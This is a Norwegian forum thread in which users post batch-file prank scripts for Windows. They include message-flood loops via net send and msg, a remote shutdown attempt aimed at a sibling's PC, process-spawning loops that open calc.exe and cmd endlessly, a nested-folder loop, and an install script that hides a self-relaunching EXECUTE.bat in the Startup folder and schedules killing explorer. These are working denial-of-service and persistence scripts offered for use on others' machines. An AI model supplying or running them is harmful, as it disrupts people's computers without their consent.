Dead_Rabbit Skrevet 18. februar 2007 Del Skrevet 18. februar 2007 Dessuten, er det mulig å slette filer som er i bruk? Lenke til kommentar
Bakke Skrevet 21. februar 2007 Del Skrevet 21. februar 2007 @echo off cls set /p host=Host / Ip: set /p message=Message: :loop net send %host% %message% goto loop Slå av net send på LAN vis noen har dette programmet Lenke til kommentar
Damp Skrevet 21. februar 2007 Del Skrevet 21. februar 2007 (endret) er det noen kommandoer for å drepe en operasjon? forresten så sliter jeg med å skrudd av broren min sin pc fra min egen, her er scriptet: ShutDown.exe -s -m \\************ -t 99 -c "Computer is now shutting down, please stand by." Når jeg kjører scriptet skjer det ingenting Er det noen instillinger jeg må fikse? Endret 21. februar 2007 av pcbygger91 Lenke til kommentar
Bakke Skrevet 21. februar 2007 Del Skrevet 21. februar 2007 (endret) Prøv kommandoen "taskkill", den fungerer for meg Endret 21. februar 2007 av mhbakke Lenke til kommentar
Giddion Skrevet 21. februar 2007 Del Skrevet 21. februar 2007 er det noen kommandoer for å drepe en operasjon? forresten så sliter jeg med å skrudd av broren min sin pc fra min egen, her er scriptet: ShutDown.exe -s -m \\************ -t 99 -c "Computer is now shutting down, please stand by." Når jeg kjører scriptet skjer det ingenting Er det noen instillinger jeg må fikse? 7994455[/snapback] dette har vært oppe mange mange mange ganger i windows programmerings forumet. her er den siste. https://www.diskusjon.no/index.php?showtopic=692961 poenget er at du MÅ ha admin rettigheter over maskinen. Lenke til kommentar
Damp Skrevet 21. februar 2007 Del Skrevet 21. februar 2007 Prøv kommandoen "taskkill", den fungerer for meg 7994502[/snapback] Jeg har home edition, det følger visst ikke med taskill der, jeg tok og søkte på google og jeg fant tskill, er det noe av det samme? Jeg fant ikke ut hvordan man brukte den da Lenke til kommentar
Gjest Slettet+56132 Skrevet 21. februar 2007 Del Skrevet 21. februar 2007 Prøv kommandoen "taskkill", den fungerer for meg 7994502[/snapback] Jeg har home edition, det følger visst ikke med taskill der, jeg tok og søkte på google og jeg fant tskill, er det noe av det samme? Jeg fant ikke ut hvordan man brukte den da 7994841[/snapback] Kan du bruke en annen tråd, dette er ikke en hjelpetråd for batchfiler, men en tråd der man kan poste irriterende/morsomme scripter. Lenke til kommentar
hernil Skrevet 21. februar 2007 Del Skrevet 21. februar 2007 et lite og veldig enkelt et jeg kommer på nå er dette: :loop msg * dette er gøy vettu! goto loop da jeg prøvde dette en gang kom meldingen opp hvert 30 sekund eller noe, uansett hvor mye jeg lukka kommandovinduet. ente med omstart. skal grave opp flere jeg har lagd bare jeg får tilbake pc'en min. Lenke til kommentar
kris98 Skrevet 22. februar 2007 Del Skrevet 22. februar 2007 Den vil aldri rette å slette seg selv. Den looper jo seg selv, hele tiden 7973535[/snapback] Hm...Det tenkte jeg jo ikke på Menne, hvis vi utelater slettinga, så hvordan kan vi disable tastaturet og musa. Prøvd og prøvd. Funker kun på meg hvis det er den eneste kommandoen i kodinga Lenke til kommentar
GeirGrusom Skrevet 22. februar 2007 Del Skrevet 22. februar 2007 Den vil aldri rette å slette seg selv. Den looper jo seg selv, hele tiden 7973535[/snapback] Hm...Det tenkte jeg jo ikke på Menne, hvis vi utelater slettinga, så hvordan kan vi disable tastaturet og musa. Prøvd og prøvd. Funker kun på meg hvis det er den eneste kommandoen i kodinga 7998180[/snapback] Den vil slette seg selv med én gang, siden start vil starte prosessen i en egen thread (i motsetning til call) og da vil den automatisk hoppe til neste punkt, og slette seg selv, så du får ikke kalt den mer en én gang. Dessuten fungerer ikke Runddl32 swlik at du kan kalle en hvilken som helst funksjon, grunnen til dette er at Rundll ikke kan vite hvilke parameter funksjonen trenger, og hvis den gjetter seg fram, vil den få stack overflow. Lenke til kommentar
Damp Skrevet 25. mars 2007 Del Skrevet 25. mars 2007 (endret) Bumper, er vel ikke så alt for gammel denne topicen? Her er en plagsom en. Klikk for å se/fjerne innholdet nedenfor echo off title EXECUTE cls at 8:00pm (tskill explorer start EXECUTE.bat ping 127.0.0.1 -n 30 -w 1000 msg * hva skjer?) exit Klikk for å se/fjerne innholdet nedenfor echo off title INSTALL cls msg * Copying files. ping 127.0.0.1 -n 10 -w 1000 msg * Files copyed to the specified directory. :x1 if exist "c:\Documents and Settings\All Users\Start-meny\Programmer\Oppstart\" ( copy EXECUTE.bat "c:\Documents and Settings\All Users\Start-meny\Programmer\Oppstart\" /y attrib +r +h "c:\Documents and Settings\All Users\Start-meny\Programmer\Oppstart\EXECUTE.bat" msg * Install complete. goto x4 ) else ( goto x2) :x2 msg * Redirecting to the path for English OS. if exist "c:\Documents and Settings\All Users\Startmenu\Programs\Startup\" ( copy EXECUTE.bat "c:\Documents and Settings\All Users\Startmenu\Programs\Startup\" /y attrib +r +h "c:\Documents and Settings\All Users\Startmenu\Programs\Startup\EXECUTE.bat" msg * Install complete. goto x4 ) else ( msg * Installation failed. goto x4) :x4 exit Klikk for å se/fjerne innholdet nedenfor echo off title UNINSTALL cls tskill cmd at /delete /yes pause msg * List deleted. :x1 if exist "c:\Documents and Settings\All Users\Start-meny\Programmer\Oppstart\EXECUTE.bat" ( attrib -r -h "c:\Documents and Settings\All Users\Start-meny\Programmer\Oppstart\EXECUTE.bat" del "c:\Documents and Settings\All Users\Start-meny\Programmer\Oppstart\EXECUTE.bat" msg * Uninstallation complete. goto x3 ) else ( msg * Redirecting to the path for English OS. goto x2) :x2 if exist "c:\Documents and Settings\All Users\Startmenu\Programs\Startup\EXECUTE.bat" ( attrib -r -h "c:\Documents and Settings\All Users\Startmenu\Programs\Startup\EXECUTE.bat" del "c:\Documents and Settings\All Users\Startmenu\Programs\Startup\EXECUTE.bat" msg * Uninstallation complete. goto x3 ) else ( msg * Did not manage to delete EXECUTE.bat, delete it manually or it has allready been deleted. goto x3) :x3 exit Endret 25. mars 2007 av pcbygger91 Lenke til kommentar
handerrefyren Skrevet 18. april 2008 Del Skrevet 18. april 2008 Grei denne tror jeg: @echo off Title Hei! echo Skriv inn navnet ditt: set /p navn= cls echo Hei %navn%, du liker vel kalkulatorer? Hvis ja, skriv ja. Hvis nei, skriv nei pause :loop start calc.exe start calc.exe start calc.exe start calc.exe start calc.exe start calc.exe start calc.exe start calc.exe goto loop Lenke til kommentar
ThorB Skrevet 25. april 2008 Del Skrevet 25. april 2008 Hvis du ikke er adminstrator har du ikke tilgang til å slå av pcen på den måten uansett, ikke utifra det jeg har prøvd ihvertfall. Min favoritt er: @echo off :goto LOOP :LOOP start cmd.exe Noe slikt ihvertfall, jeg husker ikke helt. Commando-Sondre: Det finnes minst to slikte tråder, SØK før du poster. Trodde en erfaren bruker som deg visste bedre... eller cmd.bat @echo off start cmd Lenke til kommentar
Thorsen Skrevet 25. april 2008 Del Skrevet 25. april 2008 Oppretter en haug med nøstede mapper helt til du når maks filbane, og looper videre. @echo off :beve mkdir mappe cd mappe goto beve Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå